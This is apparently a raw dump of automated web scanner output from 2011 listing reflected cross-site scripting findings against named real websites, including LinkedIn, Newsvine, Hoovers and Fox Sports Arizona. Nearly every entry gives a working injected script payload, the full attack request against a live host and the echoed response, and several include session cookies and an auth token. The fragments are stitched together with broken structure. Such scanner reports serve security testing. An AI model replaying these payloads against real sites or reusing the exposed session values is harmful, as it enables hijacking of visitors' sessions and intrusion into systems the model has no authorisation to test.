HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:24:06 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 30 Jan 2011 01:24:06 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28991
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50551'><script>alert(1)</script>bfed0d29885 was submitted in the REST URL parameter 1. This input was echoed as 50551\'><script>alert(1)</script>bfed0d29885 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content50551'><script>alert(1)</script>bfed0d29885/themes/fusion/style.css HTTP/1.1 Host: www.davidpoll.com Proxy-Connection: keep-alive Referer: http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6033be6539a/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=0327f22e76c677f66a17b5702dd9d632
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:35:38 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 30 Jan 2011 01:35:39 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 28955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 16b66'><script>alert(1)</script>deb5d103fe9 was submitted in the REST URL parameter 2. This input was echoed as 16b66\'><script>alert(1)</script>deb5d103fe9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes16b66'><script>alert(1)</script>deb5d103fe9/fusion/style.css HTTP/1.1 Host: www.davidpoll.com Proxy-Connection: keep-alive Referer: http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6033be6539a/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=0327f22e76c677f66a17b5702dd9d632
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:36:01 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 30 Jan 2011 01:36:01 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 28955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e53ad'><script>alert(1)</script>b5fc692f83c was submitted in the REST URL parameter 3. This input was echoed as e53ad\'><script>alert(1)</script>b5fc692f83c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/fusione53ad'><script>alert(1)</script>b5fc692f83c/style.css HTTP/1.1 Host: www.davidpoll.com Proxy-Connection: keep-alive Referer: http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6033be6539a/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=0327f22e76c677f66a17b5702dd9d632
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:36:30 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 30 Jan 2011 01:36:31 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 28955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf215'><script>alert(1)</script>7a65bd68b30 was submitted in the REST URL parameter 4. This input was echoed as bf215\'><script>alert(1)</script>7a65bd68b30 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/fusion/style.cssbf215'><script>alert(1)</script>7a65bd68b30 HTTP/1.1 Host: www.davidpoll.com Proxy-Connection: keep-alive Referer: http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6033be6539a/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=0327f22e76c677f66a17b5702dd9d632
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:36:58 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 30 Jan 2011 01:36:58 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 28955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8460a'><script>alert(1)</script>d095b2bd0ba was submitted in the REST URL parameter 1. This input was echoed as 8460a\'><script>alert(1)</script>d095b2bd0ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes8460a'><script>alert(1)</script>d095b2bd0ba/js/jquery/jquery.js HTTP/1.1 Host: www.davidpoll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:23:33 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 30 Jan 2011 01:23:33 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28919
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5197'><script>alert(1)</script>536fa7560e0 was submitted in the REST URL parameter 2. This input was echoed as b5197\'><script>alert(1)</script>536fa7560e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/jsb5197'><script>alert(1)</script>536fa7560e0/jquery/jquery.js HTTP/1.1 Host: www.davidpoll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:23:50 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 30 Jan 2011 01:23:51 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28919
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8a3f9'><script>alert(1)</script>d614a331f52 was submitted in the REST URL parameter 3. This input was echoed as 8a3f9\'><script>alert(1)</script>d614a331f52 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/jquery8a3f9'><script>alert(1)</script>d614a331f52/jquery.js HTTP/1.1 Host: www.davidpoll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:24:09 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 30 Jan 2011 01:24:09 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28919
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50915'><script>alert(1)</script>7ada97d6528 was submitted in the REST URL parameter 4. This input was echoed as 50915\'><script>alert(1)</script>7ada97d6528 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/jquery/jquery.js50915'><script>alert(1)</script>7ada97d6528 HTTP/1.1 Host: www.davidpoll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:24:25 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 30 Jan 2011 01:24:25 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28919
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27ef4<script>alert(1)</script>3e333fdba2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /27ef4<script>alert(1)</script>3e333fdba2b HTTP/1.1 Host: www.foxsportsarizona.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Date: Sun, 30 Jan 2011 01:24:13 GMT Connection: close Content-Length: 766
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/27ef4<script>alert(1)</script>3e333fdba2b"</strong> ...[SNIP]...
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7b076<script>alert(1)</script>2733af53564 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html7b076<script>alert(1)</script>2733af53564 HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Date: Sat, 29 Jan 2011 23:54:06 GMT Content-Length: 832 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html7b076<script>alert(1)</script>2733af53564"</strong> ...[SNIP]...
The value of the blockID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae80"><script>alert(1)</script>321dc9a6397 was submitted in the blockID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825fae80"><script>alert(1)</script>321dc9a6397&feedID=3698>1=39002 HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Pragma: no-cache Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Sat, 29 Jan 2011 23:53:48 GMT Date: Sat, 29 Jan 2011 23:53:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 48442
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... <input type=hidden name="blockID" id = "blockID" value="399825fae80"><script>alert(1)</script>321dc9a6397"> ...[SNIP]...
The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e7b6"><script>alert(1)</script>5adddc3a2b0 was submitted in the feedID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=36989e7b6"><script>alert(1)</script>5adddc3a2b0>1=39002 HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Pragma: no-cache Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Sat, 29 Jan 2011 23:54:06 GMT Date: Sat, 29 Jan 2011 23:54:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42302
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
5.330. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ffa5"%3balert(1)//4d5eca5bcd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7ffa5";alert(1)//4d5eca5bcd1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-information/--pageid__13823--/global-mktg-index.xhtml?7ffa5"%3balert(1)//4d5eca5bcd1=1 HTTP/1.1 Host: www.hoovers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Date: Sun, 30 Jan 2011 01:53:42 GMT Server: Apache Cache-Control: no-store, nocache, must-revalidate, private, post-check=0, pre-check=0 Expires: Sat, 26 Jul 1997 05:00:00 GMT X-Powered-By: PHP/5.2.8 Last-Modified: Sun, 30 Jan 2011 01:53:42 GMT Pragma: no-cache Content-Type: text/html Set-Cookie: HID=173.193.214.243.1296352422574219; path=/; expires=Fri, 29-Jan-16 01:53:42 GMT; domain=.hoovers.com Set-Cookie: HID=10.1.1.227.151141296352422579; path=/; expires=Fri, 29-Jan-16 01:53:42 GMT; domain=.hoovers.com Set-Cookie: BIGipServerholpriv-colo1=1342243082.20480.0000; path=/ P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE" Connection: close Set-Cookie: BIGipServerwww-1=1341968906.20480.0000; path=/ Content-Length: 4106
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 98145<img%20src%3da%20onerror%3dalert(1)>ab8a6f417f4 was submitted in the url parameter. This input was echoed as 98145<img src=a onerror=alert(1)>ab8a6f417f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cws/share-count?url=http%3A%2F%2Finformationarbitrage.com%2Fpost%2F3007820135%2Fstart-fund-no-big-deal-business-as-usual98145<img%20src%3da%20onerror%3dalert(1)>ab8a6f417f4 HTTP/1.1 Host: www.linkedin.com Proxy-Connection: keep-alive Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bcookie="v=1&d94e49db-3c23-4a26-a29f-2bc2d85c808d"; visit=G
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID="ajax:4385026427982852534"; Version=1; Path=/ P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Set-Cookie: leo_auth_token="GST:8HtrtVFOqFud1hjpwjpyWjXuFMG2upcnrpWYWInthCyIutxFj3dqg5:1296399980:702de7d65e108e60e7604601831862f69f5f2f9e"; Version=1; Max-Age=1799; Expires=Sun, 30-Jan-2011 15:36:19 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Vary: Accept-Encoding Content-Type: text/javascript;charset=UTF-8 Content-Language: en-US Date: Sun, 30 Jan 2011 15:06:20 GMT Content-Length: 180
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d710"%3balert(1)//68483822cd8 was submitted in the site parameter. This input was echoed as 2d710";alert(1)//68483822cd8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Advertising.aspx?site=Silverlight2d710"%3balert(1)//68483822cd8 HTTP/1.1 Host: www.neudesicmediagroup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:23:58 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Cache-Control: private Set-Cookie: ASP.NET_SessionId=m34i4mxcb24co3masqbyxaxg; path=/; HttpOnly X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Content-Length: 11128
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Contact Us | ...[SNIP]... industries = []; $('.industry:checked').each(function () { industries.push($(this).val()); });
5.333. https://www.newsvine.com/_nv/accounts/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.newsvine.com
Path:
/_nv/accounts/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aede4"><script>alert(1)</script>23d43ff5841 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /_nv/accounts/login?aede4"><script>alert(1)</script>23d43ff5841=1 HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:21:17 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=737406501fadd3f45b7f4acf77a8cd72; expires=Sat, 25-Jan-2031 03:21:17 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 10151
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Ty ...[SNIP]... <input type="hidden" name="redirect" value="/_nv/accounts/login?aede4"><script>alert(1)</script>23d43ff5841=1" /> ...[SNIP]...
The value of the path request parameter is copied into the HTML document as plain text between tags. The payload 35aee<img%20src%3da%20onerror%3dalert(1)>16f5f70bd5e was submitted in the path parameter. This input was echoed as 35aee<img src=a onerror=alert(1)>16f5f70bd5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /_vine/printer?call=streamSessionObjects§ionDomain=www&path=/_vine/3c3db971ca91afcd)(sn=*/pierre35aee<img%20src%3da%20onerror%3dalert(1)>16f5f70bd5e HTTP/1.1 Host: www.polls.newsvine.com Proxy-Connection: keep-alive Referer: http://www.polls.newsvine.com/_vine/3c3db971ca91afcd)(sn=*/pierre X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 01:35:29 GMT Connection: close Content-Length: 523
The value of the banner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e51e9"><script>alert(1)</script>cee4b8a47b8 was submitted in the banner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /includes/router_land.php?tracking=Neudesic&banner=728x90-1\e51e9"><script>alert(1)</script>cee4b8a47b8 HTTP/1.1 Host: www.reimage.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="description" content="Reimage specializes in 100% Windows OS repair."> <link href="cs ...[SNIP]... <img src="/track_new/track.php?tracking=Neudesic&campaign=728x90-1\e51e9"><script>alert(1)</script>cee4b8a47b8&adgroup=direct&ads_name=direct&keyword=direct" width="1" height="1" /> ...[SNIP]...
5.336. http://www.reimage.com/includes/router_land.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.reimage.com
Path:
/includes/router_land.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ef54"><script>alert(1)</script>298f8ddc1b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /includes/router_land.php?tracking=Neudesic&banner=728x9/4ef54"><script>alert(1)</script>298f8ddc1b00-1\ HTTP/1.1 Host: www.reimage.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the tracking request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69f18"><script>alert(1)</script>602f708c63d was submitted in the tracking parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /includes/router_land.php?tracking=Neudesic69f18"><script>alert(1)</script>602f708c63d&banner=728x90-1\ HTTP/1.1 Host: www.reimage.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
